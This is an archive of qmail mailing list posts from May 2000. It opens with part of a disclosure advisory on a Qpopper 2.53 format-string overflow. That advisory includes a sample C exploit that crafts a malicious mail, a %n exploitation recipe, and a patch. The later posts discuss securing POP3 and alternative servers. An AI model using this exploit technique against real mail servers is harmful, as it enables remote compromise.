qpop?=/ X-UIDL: AAAAAAAAAAAAAAAA From: %p%p%p%p%p%p%p test . 200 BLABLABLA Ok, message accepted for delivery. Then, luser connects with his pop account and runs euidl command there: +OK QPOP (version 2.53) at b0f starting. <666.666@b0f> USER luser +OK Password required for luser. PASS secret +OK luser has 3 messages (1644 octets). euidl 3 +OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028 Yeah, thats from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p where implemented as arguments for vsnprintf() command. * Exploiting Is this possible? Yeah, sure! But there are some limits. Qpopper2.53 from FreeBSD ports with patches is much more difficult to exploit than one from linux. It is because freebsd patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is big difference between them. Qpopper with FreeBSD's patches IS exploitable. Exploit ------- /* qpop_euidl.c exploit by prizm/Buffer0verflow Security * * Sample exploit for buffer overflow in Qpopper 2.53. * This little proggie generates a mail u need to send. * * Standard disclaimer applies. * By the way, exploit is broken =) You need to insert shellcode. * * MAD greets to tf8 for pointing out the bug, and all other b0f members. * greets to USSRLabs and ADM * check http://b0f.freebsd.lublin.pl/ for news. */ #include <stdio.h> #include <string.h> char shellcode[]="imnothing"; int main(int argc, char *argv[]) { int i; unsigned long ra=0; if(argc!=2) { fprintf(stderr,"Usage: %s return_addr\n", argv[0]); exit(0); } sscanf(argv[1], "%x", &ra); if(!ra) return; if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) { fprintf(stderr,"Bad shellcode\n"); exit(0); } fprintf(stderr,"return address: 0x%.8x\n", ra); printf("X-UIDL: "); for(i=0; i < sizeof(shellcode);i++) printf("%c", shellcode[i]); printf("\r\n"); printf("From: %s", "%.1000d"); for(i=0; i < 50; i++) printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24); printf("@test\r\n"); printf("Subject: test\r\n\r\nhuh?\r\n.\r\n"); return 0; } Exploiting QPOP from FreeBSD ports ---------------------------------- It is NOT easy, because vsprintf() is replaced with vsnprintf() so we can't overflow stack, but we still have control over it (remeber %n?). Im not going to post exploit for this because it is really generic, but I will explain theory on exploiting qpop with vsNprintf. There is an little trick with %n YOu should know. Try to understand why folowing code succeeds and prints out 2000, not sizeof(b): ---<cut>--- #include <stdio.h> int main(void){ int s=1; char b[1024]; int q; snprintf(b, sizeof(b), "%.2000d%n", 1, &q); return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES")); } ---</cut>--- On my box with FreeBSD 3.4 i have: 2000, overflowed? NO Hah, first time i expected to see 1024, but YOu know that all is unpredictable . So, this little thing will help us a lot. Exploiting it: a) Find where in stack is located user input. b) Compose a message with filed X-UIDL and From: X-UIDL: ppRETARETARETARETA From: <SHELLCODE>%.RETURNd%n@test where: "pp" is for padding (two or three chars) "RETA" is return address pointing to SHELLCODE "SHELLCODE" guess "RETURN" return address c) Exploit? If you need an exploit that will work on FreeBSD, code it yourself. * Vulnerable Versions 2.53(Others?) * Fix You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which is not vulnerable to this problem. Or you can manually patch it by doing the following: At lines 150 and 62 from pop_msg.c, replace: - return (pop_msg (p,POP_SUCCESS, buffer)); to: + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); copyright � 1999-2000 prizm, buffer0verfl0w security b0f.freebsd.lublin.pl
-----BEGIN PGP SIGNED MESSAGE----- Wasn't it claimed that 2.53 was safe -- only earlier versions (alpha/beta?) were at risk? Seems like they should just release another version to lessen the confusion. Scott -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOSwjblpGPE+AF6qBAQEiZwQAvICxK3K0VPNxX4v7agjf5owZ6ZtDPC9r 3egzkz30iQDHNSTNskPC8IQlVV4PBgthIjY7rJvFQBzE9zgRevF0MVvQ4+WdAeyM YLLl72l3pqr0y70qWfD72+6EyRwscb2yBaIvNK6Vk3/t58i8anL0iQO0aeIQYrvL cbNH+O6S74w= =ZbNr -----END PGP SIGNATURE-----
Unknown. The advisory specifically mentions 2.53 -- i can tell you this. 2.53 _was_ safe from the PREVIOUS exploits (ie. the ones that worked on the 2.51, etc) but this appears to be a new exploit in a different function of the program. Also, the advisory suggests upgrading to 3.1b1 (which i did) and says that it's a safe version (for now, anyway) Are there any known exploits for 2.1b1? On Wed, 24 May 2000, Scott D. Yelich wrote: >-----BEGIN PGP SIGNED MESSAGE----- > > >Wasn't it claimed that 2.53 was safe -- only earlier versions >(alpha/beta?) were at risk? Seems like they should just release >another version to lessen the confusion. > >Scott > > >-----BEGIN PGP SIGNATURE----- >Version: 2.6.2 > >iQCVAwUBOSwjblpGPE+AF6qBAQEiZwQAvICxK3K0VPNxX4v7agjf5owZ6ZtDPC9r >3egzkz30iQDHNSTNskPC8IQlVV4PBgthIjY7rJvFQBzE9zgRevF0MVvQ4+WdAeyM >YLLl72l3pqr0y70qWfD72+6EyRwscb2yBaIvNK6Vk3/t58i8anL0iQO0aeIQYrvL >cbNH+O6S74w= >=ZbNr >-----END PGP SIGNATURE----- > > -- _ __ _____ __ _________ ______________ /_______ ___ ____ /______ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [---------------------------------------------[system info]-----------] 1:30pm up 13 days, 18:56, 4 users, load average: 0.16, 0.16, 0.17
John Gonzalez/netMDC admin <[EMAIL PROTECTED]> writes: > Unknown. The advisory specifically mentions 2.53 -- i can tell you this. > 2.53 _was_ safe from the PREVIOUS exploits (ie. the ones that worked on > the 2.51, etc) but this appears to be a new exploit in a different > function of the program. 2.53 appears to be vulnerable. > Also, the advisory suggests upgrading to 3.1b1 (which i did) and says > that it's a safe version (for now, anyway) The 3.x series has been having *tons* of security problems, including stuff that was previously fixed in 2.x. I really don't trust it. -- Russ Allbery ([EMAIL PROTECTED]) <http://www.eyrie.org/~eagle/>
>The 3.x series has been having *tons* of security problems, including >stuff that was previously fixed in 2.x. I really don't trust it. There is realy no point in using qpopper. I have used it in isp enviroment and i can say that it sucks. It doesn't do any mailbox locking, it just copies the whole thing to temp dir back and forth. this kills the performace. (id 3.x better?). You have a broad choice: a) qmail-pop3d - maildir only, lightweight, good b) cucipop - this is what i use at the moment, mailbox only, fast, small c) popa3d - by solar designer - small, fast, compatible, mailbox only http://freshmeat.net/redir/homepage/936847115/ d) solid pop3d - quality from Poland - like the above but with more features, maildir & mailbox http://solidpop3d.pld.org.pl/ Why waste your time with lame servers like qpop when you have so broad choice of better alternatives. Kris
I'm using qmail 1.0.3 with the included qmail-pop3d. What's the best way on the server side to prevent passwords from being sent as clear text over the network for a pop3 session? I know users will be reluctant to change their mua's. So what can I do on my side? Is there any way around this without expecting anything from the pop users?
[EMAIL PROTECTED] wrote: > > What's the best way on the server side to prevent passwords from being > sent as clear text over the network for a pop3 session? I'm afraid the best way is also the only way, and it doesn't exist. You cannot use POP3 without sending passwords in the clear. Len. -- VENONA traffic was broken by the NSA because the Soviets reused their one time pads. -- Bruce Schneier
It is possible to wrap POP3 with SSL, which most mailers support. Take a look at http://www.rickk.com/sslwrap/ --Adam On Wed, May 24, 2000 at 03:38:53PM -0400, Len Budney wrote: > [EMAIL PROTECTED] wrote: > > > > What's the best way on the server side to prevent passwords from being > > sent as clear text over the network for a pop3 session? > > I'm afraid the best way is also the only way, and it doesn't exist. You > cannot use POP3 without sending passwords in the clear. > > Len. > > -- > VENONA traffic was broken by the NSA because the Soviets reused their > one time pads. > -- Bruce Schneier >
[EMAIL PROTECTED] (Len Budney) writes: > [EMAIL PROTECTED] wrote: > > > > What's the best way on the server side to prevent passwords from being > > sent as clear text over the network for a pop3 session? > > I'm afraid the best way is also the only way, and it doesn't exist. You > cannot use POP3 without sending passwords in the clear. What about SSH connection forwarding? ^L
I was reading a howto about that and from what I understand, that's a client side deal. Louis Theran wrote: > [EMAIL PROTECTED] (Len Budney) writes: > > > [EMAIL PROTECTED] wrote: > > > > > > What's the best way on the server side to prevent passwords from being > > > sent as clear text over the network for a pop3 session? > > > > I'm afraid the best way is also the only way, and it doesn't exist. You > > cannot use POP3 without sending passwords in the clear. > > What about SSH connection forwarding? > > ^L -- i no naka no kawazu taikai wo shirazu
[EMAIL PROTECTED] writes: [ not sending POP3 passwords in the clear. I suggested SSH connection forwarding. ] > I was reading a howto about that and from what I understand, that's a client > side deal. Set up sshd on a host that shares a trusted link with your pop server (or on the pop server itself). Configure the pop server to reject connections not originating from inside the trusted network. Have users set their SSH clients to forward connections to localhost:110 to popserver:110 (on UNIX this looks something like: ssh -L110:popserver:110 sshhost) and point their email readers at localhost. Now all your POP3 traffic is encrypted over untrusted networks. This isn't the only way to secure POP3, but it's easy, general and very portable. Other options include Kerberos and the SSLwrap thing that somebody else mentioned. My original comment was merely pointing out that `there is no way' is correct only in a narrow sense. ^L
"Louis Theran" <[EMAIL PROTECTED]> wrote: > [EMAIL PROTECTED] (Len Budney) writes: > > > [EMAIL PROTECTED] wrote: > > > > > > What's the best way on the server side to prevent passwords from being > > > sent as clear text over the network for a pop3 session? > > > > I'm afraid the best way is also the only way, and it doesn't exist. You > > cannot use POP3 without sending passwords in the clear. > > What about SSH connection forwarding? That's a dandy idea. However, once you do that it's not POP3 anymore. In particular, the clients have to set up forwarding, which violates the part about ``on the server side'' above. (You weren't suggesting port forwarding from the server to itself, of course, which would be a silly idea.) Len. -- Frugal Tip #9: Fence stolen merchandise.
"Louis Theran" <[EMAIL PROTECTED]> wrote: > > My original comment was merely pointing out that `there is no way' > is correct only in a narrow sense. Right; namely, the sense in which the poster asked. He asked for a way to modify the server ONLY, and end up using POP3 without any passwords traveling en claire. I replied that THAT is impossible. Other things, of course, may or may not be impossible. However, if ``most clients'' actually support SSL, then I may have simply been wrong. (I'm not gonna quibble that POP3+SSL isn't POP3, because although it isn't, who cares?) The original poster needs to know the definition of ``most clients'', and probably will have to run two POP3 servers--a secure one for savvy clients, and an insecure one for stupid clients. Unless ``most clients'' is an inclusive enough class. Len. -- It will work, and it's probably secure; but I didn't design it to run setuid, so don't do it. -- Dan Bernstein
From: "Len Budney" <[EMAIL PROTECTED]> Date: Wed, 24 May 2000 15:38:53 -0400 [EMAIL PROTECTED] wrote: > > What's the best way on the server side to prevent passwords from being > sent as clear text over the network for a pop3 session? I'm afraid the best way is also the only way, and it doesn't exist. You cannot use POP3 without sending passwords in the clear. Len. Why not require APOP? -- Bob Rogers
Len Budney writes: > [EMAIL PROTECTED] wrote: > > > > What's the best way on the server side to prevent passwords from being > > sent as clear text over the network for a pop3 session? > > I'm afraid the best way is also the only way, and it doesn't exist. You > cannot use POP3 without sending passwords in the clear. Doesn't anybody implement APOP?? -- -russ nelson <[EMAIL PROTECTED]> http://russnelson.com Crynwr sells support for free software | PGPok | "Ask not what your country 521 Pleasant Valley Rd. | +1 315 268 1925 voice | can force other people to Potsdam, NY 13676-3213 | +1 315 268 9201 FAX | do for you..." -Perry M.
Russell Nelson <[EMAIL PROTECTED]> writes: > Len Budney writes: >> I'm afraid the best way is also the only way, and it doesn't exist. You >> cannot use POP3 without sending passwords in the clear. > Doesn't anybody implement APOP?? Even better, there are innumerable different authentication mechanisms possible once you use SASL, including ones considerably better than APOP, and POP3 definitely supports SASL. You can definitely use POP3 without cleartext passwords. -- Russ Allbery ([EMAIL PROTECTED]) <http://www.eyrie.org/~eagle/>
on 5/24/00 8:03 PM, Russell Nelson at [EMAIL PROTECTED] wrote: >> I'm afraid the best way is also the only way, and it doesn't exist. You >> cannot use POP3 without sending passwords in the clear. > > Doesn't anybody implement APOP?? The Gnome/Helixcode guys are working on an outlook type app that does APOP. Outlook Express for the mac does SSL and "secure password" but does not mention APOP in the docs or in the configuration. Pat
[EMAIL PROTECTED] wrote: > > I'm using qmail 1.0.3 with the included qmail-pop3d. > > What's the best way on the server side to prevent passwords from being > sent as clear text over the network for a pop3 session? I know users > will be reluctant to change their mua's. So what can I do on my side? > Is there any way around this without expecting anything from the pop > users? I use stunnel which doesn't require changes on qmail. Check this: http://security.fi.infn.it/tools/stunnel/index-en.html. I can share my configuration to anyone interested. LLU
Where do I find this program? Or any "vacation" program, preferably one that the user themselves can handle (edit message and starting / ending time etc). -- Kaare Rasmussen --Linux, spil,-- Tlf: 3816 2582 Kaki Data tshirts, merchandize Fax: 3816 2582 Howitzvej 75 �ben 14.00-18.00 Email: [EMAIL PROTECTED] 2000 Frederiksberg L�rdag 11.00-17.00 Web: www.suse.dk
Hi, It's not a qmail question, but because many of you are in the high-volume mail business, I hope to get a few answers :-) A colleague of mine works for a place where they're going to change from an X400 system to MS Exchange. I don't have details on the hardware, but they're planning on using 1 server per 1000 accounts. I seem to remember to have read (maybe on this list) that Exchange doesn't like that amount of users, and that 300-400 is about the right number of accounts per server. MS litterature speaks about 2000-15000 accounts per server, but that seems rather optimistic for PC class hardware, even when the network seems OK (in this case, switched 10Mb/s). Any comments, cites on the ideal number of accounts per Exchange server? Thanks a lot, Stefaan -- --PGP key available from PGP key servers (http://www.pgp.net/pgpnet/)-- Ninety-Ninety Rule of Project Schedules: The first ninety percent of the task takes ninety percent of the time, and the last ten percent takes the other ninety percent.
I am always happy when I see another "big" web operation using qmail.. I just discovered paypal.com runs qmail, after I got the "I'm sorry it didn't work out." bounce message from a typo... --Pete
>> On Wed, 24 May 2000 13:33:11 -0600 (MDT), >> John Gonzalez/netMDC admin <[EMAIL PROTECTED]> said: N> Are there any known exploits for 2.1b1? CUCIpop has been mentioned on this list before; small, fast, some nifty features, and I don't remember seeing any security warnings about it. ftp://ftp.informatik.rwth-aachen.de/pub/packages/cucipop/ -- Karl Vogel ASC/YCOA, Wright-Patterson AFB, OH 45433, USA [EMAIL PROTECTED] or [EMAIL PROTECTED] Instead of getting married again, I'm going to find a woman I don't like and give her a house. --Lewis Grizzard
CUCIpop is pretty decent, I've used it before. Observations: 1) It's not actively developed (the most current version was released sometime in '98) 2) It doesn't compile cleanly on some platforms without disabling significant features (Solaris 2.6 and 7) 3) It *may* be just as insecure as qpopper -- just because there are no working exploits out doesn't mean the code is secure. It might just not be popular enough to warrant significant attention from crackers. 4) It's not totally free. If I remember correctly, the license requires some sort of homage or payment to the author to use it legally unless you are non-profit/etc. That being said, it is a nice, fast and stable POP3 implementation. --Adam On Wed, May 24, 2000 at 05:07:08PM -0400, vogelke wrote: > >> On Wed, 24 May 2000 13:33:11 -0600 (MDT), > >> John Gonzalez/netMDC admin <[EMAIL PROTECTED]> said: > > N> Are there any known exploits for 2.1b1? > > CUCIpop has been mentioned on this list before; small, fast, some > nifty features, and I don't remember seeing any security warnings > about it. > > ftp://ftp.informatik.rwth-aachen.de/pub/packages/cucipop/ > > -- > Karl Vogel > ASC/YCOA, Wright-Patterson AFB, OH 45433, USA > [EMAIL PROTECTED] or [EMAIL PROTECTED] > > Instead of getting married again, I'm going to find a > woman I don't like and give her a house. --Lewis Grizzard >
Does anyone know if there is a patch or set of patches for PINE that allow it to read mail over IMAPS (SSL IMAP)? We may be rolling out SSL IMAP and POP3 where I work, and the Windows clients all support this natively. Any help would be appreciated. Thanks, --Adam
i have to setup qmail with vpopmail/qmailadmin to forward all mail for domain-a.com to domain-a.nl only domain-a.nl contains the users. so mail for [EMAIL PROTECTED] will be delivered to [EMAIL PROTECTED] in control/virtualdomains: domain-a.nl:domain-a.nl domain-a.com:domain-a.nl problem is that all mail for domain-a.com is deleverd to [EMAIL PROTECTED] the catchall user. greetings marco leeflang
Christer Matson <[EMAIL PROTECTED]> schrieb/wrote: > Is there a virus in the attachment? I ran Norton AV on it, but it did not > find any. I didn't send any attachments. Claus -- begin 666 LOVE-LETTER-FOR-YOU.TXT.vbs Ich bin ein Signaturvirus. Verbreite mich! end http://www.faerber.muc.de/
>I didn't send any attachments. > >Claus Beg to differ Your emails contain the following: > begin 666 LOVE-LETTER-FOR-YOU.TXT.vbs > Ich bin ein Signaturvirus. Verbreite mich! > end > http://www.faerber.muc.de/ The 'begin' looks exactly like the start of a uuencoded file. Are you including this in your emails deliberately, or did you not know you were doing this _______________________________________________________________ This message has been checked for all known viruses by the MessageLabs Virus Control Centre. For further information visit http://www.messagelabs.com/stats.asp
You have the following attached to your message: > -- > begin 666 LOVE-LETTER-FOR-YOU.TXT.vbs > Ich bin ein Signaturvirus. Verbreite mich! > end > http://www.faerber.muc.de/ > As you can see from the below copy of your message, the file LOVE-LETTER-FOR-YOU.TXT.vbs gets decoded by my MUA on receipt. This file has the same name as a well known virus. In article <[EMAIL PROTECTED]>, Claus F�rber wrote: > Date: 25 May 2000 00:42:00 +0200 > From: [EMAIL PROTECTED] (Claus F�rber) > To: [EMAIL PROTECTED] > Subject: Re: pop3 > > Christer Matson <[EMAIL PROTECTED]> schrieb/wrote: > > Is there a virus in the attachment? I ran Norton AV on it, but it did not > > find any. > > I didn't send any attachments. > > Claus > > -- > > [Attachment decoded to FILE://c:\TempDL\LOVE-LETTER-FOR-YOU.TXT.vbs] > http://www.faerber.muc.de/ > * eMailBye * Christer Matson, Siljansnas, Sweden * Science etSense AB * Thu, 25 May 2000 10:31 +0200
